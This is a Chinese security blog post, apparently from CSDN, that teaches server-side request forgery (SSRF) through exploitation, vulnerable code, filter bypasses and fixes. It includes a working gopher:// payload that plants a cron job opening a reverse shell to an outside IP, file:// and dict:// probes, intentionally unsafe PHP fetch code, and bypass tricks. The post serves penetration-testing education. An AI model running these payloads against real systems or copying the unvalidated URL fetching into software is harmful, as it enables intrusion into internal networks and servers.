WEB渗透【9】SSRF漏洞攻击与防御

最新推荐文章于 2024-04-15 16:18:30 发布
最新推荐文章于 2024-04-15 16:18:30 发布
阅读量506 收藏 1
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunjikui1255326447/article/details/103845383
版权

目录

一、概述

二、SSRF的危害

三、漏洞利用

四、漏洞代码

六、常见的过滤与绕过

七、修复方案

一、概述

       SSRF(Server-side Request Forge, 服务端请求伪造)。
       由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务。

二、SSRF的危害

  1. 扫内网

  2. 向内部任意主机的任意端口发送精心构造的Payload

  3. DOS攻击(请求大文件,始终保持连接Keep-Alive Always)

  4. 攻击内网的web应用,主要是使用GET参数就可以实现的攻击(比如struts2,sqli等)

  5. 利用file协议读取本地文件等

三、漏洞利用

本地利用

# dict protocol (操作Redis)
curl -vvv 'dict://127.0.0.1:6379/info'

# file protocol (任意文件读取)
curl -vvv 'file:///etc/passwd'

# gopher protocol (一键反弹Bash)
# * 注意: 链接使用单引号,避免$变量问题
curl -vvv 'gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/103.21.140.84/6789 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'

远程利用

  • 漏洞代码testssrf.php(未作任何SSRF防御)
<?php
function curl($url){
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $url);
                curl_setopt($ch, CURLOPT_HEADER, 0); 
                curl_exec($ch);
                curl_close($ch); 
}
$url = $_GET['url'];
curl($url);
?>

 1、利用file协议读取文件

2、利用dict协议查看端口开放
当端口开放的时候:

当端口未开放的时候,没有内容

3、利用gopher协议反弹shell 

四、漏洞代码

curl造成的SSRF

function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
}

$url = $_GET['url'];
curl($url);

file_get_contents造成的SSRF

$url = $_GET['url'];
echo file_get_contents($url);

fsockopen造成的SSRF

<?php
function Getfile($host, $port, $link){
    $fp = fsockopen($host, intval($port), $errno, $errstr, 30);
    if(!$fp){
        echo "$errstr (error number $errno) \n";
    }else{
        $out = "GET $link HTTP/1.1\r\n";
        $out .= "HOST $host \r\n";
        $out .= "Connection: Close\r\n\r\n";
        $out .= "\r\n";
        fwrite($fp, $out);
        $content = '';
        while(!feof($fp)){
            $contents .= fgets($fp, 1024);
        }
        fclose($fp);
        return $contents;
    }
}

六、常见的过滤与绕过

常见的过滤

  1. 过滤开头不是http://xxx.com的所有链接
  2. 过滤格式为ip的链接,比如127.0.0.1
  3. 结尾必须是某个后缀

绕过方法

  1. http基础认证
    http://xxx.com@attacker.com

  2. 利用302跳转(xip.iowww.tinyrul.com
    2.1 当我们访问xip.io的子域,比如127.0.0.1.xip.io的时候,实际上会被自动重定向到127.0.0.1
    2.2 如果利用上面的方法会被检测127.0.0.1的话,可以利用www.tinyurl.com提供的服务来进行绕过

  3. 加上#或?即可

4.更改其他进制的ip

七、修复方案

修复方案:

• 限制协议为HTTP、HTTPS

• 不用限制302重定向

• 设置URL白名单或者限制内网IP

 

 

司徒荆
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mutillidae web渗透平台
08-22
总的来说,"Mutillidae web渗透平台"是一个强大的学习工具,为网络安全新手提供了宝贵的学习机会,帮助他们熟悉web应用的安全漏洞,并学习如何保护系统免受攻击。通过不断地练习和探索,你可以逐步成长为一名合格的...
Build Your SSRF Exploit Framework SSRF-一个只影响有钱人的漏洞-猪猪侠.pdf
09-17
SSRF漏洞通常出现在应用中,当程序不恰当地处理了来自用户输入的URL或者请求时,攻击者可以操纵服务器去访问内网资源,甚至执行特定操作。 在“Build Your SSRF Exploit Framework SSRF-一个只影响有钱人的漏洞-...
【Linux】 curl 命令
qq_42320804的博客
11-15 2464
基础语法 curl [option] [url] 项目使用 curl -d '{"orderNum":"","message":"取数失败"}' -H "Content-type: application/json" -X POST http://110.76.55.205:8010/wszx-web/api/bank/OrderStop?token= curl -H "Content-type: application/json" -X POST http://110.76.5..
利用curl测试WSS连接的建立
至虛極,守靜篤
11-16 1190
【代码】利用curl测试WSS连接的建立。
curl命令总结
最新发布
前人栽树,后人乘凉。
04-15 1683
如果你想让 curl 使用你喜欢的浏览器使用的证书,你可能需要下载/编译一个转换器,可以将浏览器的格式化证书转换为 PEM 格式的证书。一个字段是要发布的文件名,一个字段是您的姓名,一个字段是文件描述。在我们的示例中,输入字段名称为 和。你意识到,如果别人掌握了你的密码,这是一个很大的安全风险,因此大多数Unix程序不会读取这个文件,除非它只有你自己可以读(curl不在乎)。通常,curl 会自动从私钥文件中提取公钥,但在 curl 没有适当的库支持的情况下,必须使用该选项指定匹配的公钥文件。
curl发送带有Authorization的POST请求
weixin_46031767的博客
05-06 8658
一、参数说明 格式: curl -H 请求头 -d 请求体 -X POST 接口地址 参数 内容 格式 -H(- -header) 请求头 “Content-Type: application/json” -d 请求内容 “{“remote_host”: “10.163.215.41”, “service_name”: “telegraf”}” -u(- -user) Authorization(账号密码) admin:password -X 请求协议 POST、GET、PUS
Web中常见的绕过和技巧
devil8123665的博客
10-15 1093
参考文献Web中常见的绕过和技巧 - mrhonest - 博客园 SQL注入 十六进制绕过引号 slect table_name from information_schema.table where table_schema="sqli"; slect table_name from information_schema.table where table_schema=0x73716c69; slect table_name from information_.
[漏洞分析] CVE-2023-38545 curl“史上最严重的漏洞“分析
Breeze的博客
10-13 4932
分析与复现curl"史上最严重漏洞"CVE-2023-38545
超全的Web渗透自我学习资料合集(64篇).zip
09-30
web渗透: 服务端请求伪造攻击SSRF) web渗透: 跨站脚本攻击(XSS) web渗透: HTTP Host头攻击 web渗透: SQL注入(上) web渗透: SQL注入(下) web渗透: XML注入攻击 web渗透: XXE外部实体注入 web渗透: 服务器端...
web渗透系列教学下载共64份.zip
12-30
web渗透--18--服务端请求伪造攻击SSRF).pdf web渗透--19--跨站脚本攻击(XSS).pdf web渗透--2--web渗透测试清单.pdf web渗透--20--HTTP Host头攻击.pdf web渗透--21--SQL注入(上).pdf web渗透--22--SQL注入...
web常见漏洞思维导图.rar
03-04
"web常见漏洞思维导图.rar"这个压缩包文件提供了对这些漏洞的系统性概述,涵盖了漏洞的原理和利用方式,这对于渗透测试和网络安全防护具有极大的价值。下面将详细阐述其中涉及的知识点。 首先,Web常见漏洞主要包括...
SSRF漏洞
huangyongkang666的博客
03-21 1137
SSRF漏洞 1.什么是SSRF漏洞 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 2.SSRF漏洞原理 ​ SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。例如,黑客操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片等,利用的是服务端的请求伪造。SSRF利用存在缺陷的Web 应用作为代理攻
漏洞原理——ssrf
nobugnomoney的博客
04-04 2万+
一、什么是SSRF 1、简单了解 SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统。也就是说可以利用一个网络请求的服务,当作跳板进行攻击攻击者利用了可访问Web服务器(A)的特定功能 构造恶意payload;攻击者在访问A时,利用A的特定功能构造特殊payload,由A发起对内部
linux模拟网页提交,用curl 模拟浏览器进行提交
weixin_36326053的博客
05-15 393
curl-X POST 默认是get 可以改为post--data "data=xxx" 要提交的数据--header "Content-Type:application/json" 增加各种头信息,可以从chrome调试中直接找到http://www.example.com/form.cgi 访问的网站url其他参数--data-urlencode 是data参数的一种替代,可以对data...
网络安全-SSRF漏洞原理、攻击防御
热门推荐
关注网络安全、云原生安全
09-05 2万+
概述 SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统(因为他是从内部系统访问的,所以它能够请求到与它相连而与外网隔离的内部系统。)。 原理 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档等等。SSRF漏洞通过篡改获取资源的请求发送给服务器(服...
了解SSRF漏洞,这一篇就足够了......
2201_75571291的博客
06-13 3522
SSRF(Server-Side Request Forgery,服务端请求伪造),是攻击者让服务端发起构造的指定请求链接造成的漏洞。​由于存在防火墙的防护,导致攻击者无法直接入侵内网;这时攻击者可以以服务器为跳板发起一些网络请求,从而攻击内网的应用及获取内网数据。
curl 302重定向_下文件,抓网页,你常用的curl竟还有这功能!会的已经去大厂了
weixin_39616379的博客
11-23 824
引言curl 是一个软件包,由命令行工具和使用URL语法传输数据的库组成。curl 支持多种协议,如DICT、FILE、FTP、FTPS、Gopher、HTTP、HTTPS、IMAP、IMAPS、LDAP、LDAPS、POP3、POP3S、RTMP、RTSP、SCP、SFTP、SMTP、SMTPS、Telnet和TFTP。本文用实例深度演示 curl 的详细用法。下载单个文件下面的命令将获取URL...
SSRF漏洞详解
qq_48904485的博客
03-22 1万+
一、SSRF概述 SSRF全称为Server-side Request Fogery,中文含义为服务器端请求伪造,漏洞产生的原因是服务端提供了能够从其他服务器应用获取数据的功能,比如从指定的URL地址获取网页内容,加载指定地址的图片、数据、下载等等。 一般情况下,我们服务端请求的目标都是与该请求服务器处于同一内网的资源服务,但是如果没有对这个请求的目标地址、文件等做充足的过滤和限制,攻击者可通过篡改这个请求的目标地址来进行伪造请求,所以这个漏洞名字也叫作“服务器请求伪造”。 利用SSRF能实现以下效果: 1
SSRF详解(包含多种SSRF攻击)
Zyu0
11-28 5156
服务器端请求伪造(也称为 SSRF)是一种 Web 安全漏洞,允许攻击者诱导服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下,他们可能会强制服务器连接到任意外部系统,从而可能泄露授权凭证等敏感数据。如果攻击者能够将url参数更改为localhost,这可能允许他们查看服务器上托管的本地资源,从而使其容易受到服务器端请求伪造的攻击。滥用易受攻击的服务器与其他系统之间的信任关系绕过 IP 白名单。
ssrf漏洞内网渗透_ssrf漏洞分析
06-06
SSRF (Server-Side Request Forgery) 漏洞是一种常见的 Web 安全漏洞攻击者通过构造恶意的请求,从而使服务器发起非预期的请求,可能导致敏感信息泄露、服务器受到攻击等后果。 在内网渗透中,SSRF 漏洞可以用来发起内网扫描、访问内部系统等攻击。通常情况下,攻击者会构造恶意请求,将目标网站的请求地址改为内部 IP 或者域名,从而让服务器发起请求,从而得到内部系统的信息。 下面是一个简单的 SSRF 漏洞利用的步骤: 1. 扫描目标网站:使用端口扫描工具扫描目标网站开放的端口,确定是否存在可利用的服务。 2. 构造恶意请求:构造一个包含内网地址的恶意请求,将请求地址改为内网地址。 3. 触发漏洞:将恶意请求发送给目标网站,从而触发 SSRF 漏洞。 4. 收集信息:利用 SSRF 漏洞,收集内部系统的信息,如端口、服务、操作系统等。 5. 利用漏洞:根据收集到的信息,选择合适的漏洞利用方式,从而取得系统权限。 在实际攻击中,攻击者还可能会采用其他方式来利用 SSRF 漏洞,如访问内部 Web 应用、获取敏感文件等。因此,网站开发人员需要注意防范 SSRF 漏洞,如过滤用户输入、限制请求地址等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值